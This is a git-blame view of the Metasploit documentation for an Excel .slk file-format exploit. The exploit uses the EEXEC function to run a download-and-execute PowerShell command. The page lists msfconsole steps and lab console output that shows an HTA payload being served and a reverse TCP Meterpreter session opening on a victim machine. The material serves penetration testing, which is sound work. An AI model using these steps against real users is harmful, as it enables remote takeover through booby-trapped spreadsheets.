Files
metasploit-gs/documentation/modules/exploit/windows/fileformat/office_excel_slk.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

53 lines
1.6 KiB
Markdown
Raw Normal View History

2019-01-14 14:56:42 -05:00
## Introduction
The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function.
2019-01-14 14:56:42 -05:00
This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session
on the target.
## Vulnerable Application
2019-01-17 20:00:23 -05:00
Microsoft Excel (tested on Excel 2016)
2019-01-14 14:56:42 -05:00
## Verification Steps
1. Start `msfconsole`
2. `use exploit/windows/fileformat/office_excel_slk`
2019-01-17 20:00:23 -05:00
3. `set LHOST [IP]`
4. `set SRVHOST [IP]`
2019-01-22 20:44:18 -05:00
5. `run`
6. Open generated file and press 'Enable Content' in Excel
2019-01-14 14:56:42 -05:00
## Options
**FILENAME**
2019-01-17 20:00:23 -05:00
The name of the generated .slk file. Default is a randomly generated file name.
2019-01-14 14:56:42 -05:00
## Scenarios
2019-01-17 20:00:23 -05:00
### Microsoft Excel 2016 on Windows 10 Build 17763.288
2019-01-14 14:56:42 -05:00
```
msf > use exploit/windows/fileformat/office_excel_slk
msf exploit(office_excel_slk) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_excel_slk) > set lhost 192.168.146.1
lhost => 192.168.146.1
msf exploit(office_excel_slk) > set srvhost 192.168.146.1
srvhost => 192.168.146.1
msf exploit(office_excel_slk) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/carter/.msf4/local/msf.slk
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.
```
2019-01-14 14:56:42 -05:00
Once the victim opens the file and clicks 'Enable Content' a session should spawn:
2019-01-14 14:56:42 -05:00
```
[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2019-01-13 16:00:49 -0500
```